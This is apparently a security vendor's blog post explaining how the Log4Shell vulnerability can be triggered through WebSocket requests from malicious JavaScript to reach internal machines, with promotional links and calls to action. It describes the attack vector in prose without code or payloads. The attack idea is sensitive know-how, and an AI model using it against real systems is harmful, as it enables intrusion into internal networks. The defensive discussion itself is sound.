Infiltrating Internal Networks with Log4Shell

Infiltrating Internal Networks with Log4Shell

Now that the year is at its last days, we can retrospectively examine the most significant disruption that occurred in 2021. Slowly we begin to grasp the scope of events that followed the discovery of CVE-2021-44228, also known as ‘Log4Shell’, and its impact on the information security world. 

While security teams worked over the clock to protect their servers from the vulnerability, they overlooked a more sophisticated Log4Shell attack vector. One that enables hackers to reach into their victim’s internal environments. 


Read more on the bing domain vulnerability.


Exploiting Log4Shell vulnerability via WebSockets

Since the discovery, many security researchers have delved into deeper learning on this vulnerability to exploit its volatile potential. In a report by Blumira’s CTO, Matthew Warner, he presented a vulnerability they found by triggering it using a WebSocket connection to machines with Log4J libraries. This is critical because it enables attacks on local services. In simple words, hackers utilize the vulnerability to attack devices disconnected from the internet! 

“Until now, everybody looked for Log4Shell vulnerability on external servers open to the world. Now, hackers can even attack internal machines that you didn’t think can be breached,” says Ysrael Gurt, Reflectiz CTO. “This vector significantly expands the attack surface and can impact services running using VPN or ones that are connected to the local network.”


Read more on WebSockets and portscanning.


Why Websocket increases the attack surface

The real game-changer in the latest discovery proves that by utilizing WebSocket communication for the Log4J vulnerability exploit. This opens an entirely new attack vector that uses a digital supply chain and Java tools to attack previously unreachable machines through a compromised server. Since WebSocket is a network request that runs on the client-side, every service accessing the user machine will be targeted by the WebSocket request.

But how will the Websocket be triggered? Websites can serve the crafted JavaScript code to their users. Let’s assume the user visits an unsafe website or is lured by a phishing campaign. The user will then enter the compromised websites that will load the different scripts running there, including the malicious JavaScript, to exploit the Log4J vulnerabilities. His browser will actively send malicious requests from the compromised device to other servers that communicate with his localhost to create a breach point into an organization.

This is why JavaScript libraries are such a valuable target for threat actors. Attacking a single website might affect all of the website’s users, but attacking a popular library might affect a hundred million users worldwide. 


Read more on malicious JavaScript in Tetris – a State-Sponsored Surveillance Kit


The power of client-side and JavaScript attacks

“This again proves the untapped potential of client-side code,” Ysrael explains. “JavaScript is external code that runs on the user’s computer,” he adds. “It means that you can raise as many security measurements as possible, but at the end of the day, hackers are looking to attack the weakest link in your supply chain.” 

This case provides us with another proof of the limitless possibilities of JavaScript frameworks as a tool to perform cyber-attacks. It proves, yet again, that all you need to compromise even the highest secured entity is to find the right blind spot. 


Read more on similar discoveries in CDNjs RCE.


We already knew how dangerous the extensive use of Log4J libraries across various devices is. However, this discovery proves that threat actors can evaluate Log4Shell vulnerability into large-scale supply chain attacks.

The Log4Shell saga is an ongoing event. It’s an event of which we are yet to see the full scope of its impact. It reminds us that there’s always a new vulnerability to exploit. 

Third-party applications help your eCommerce site run smoothly.

Reflectiz helps it run securely.

Try for Free

Book a Demo

Modal title

Book a Demo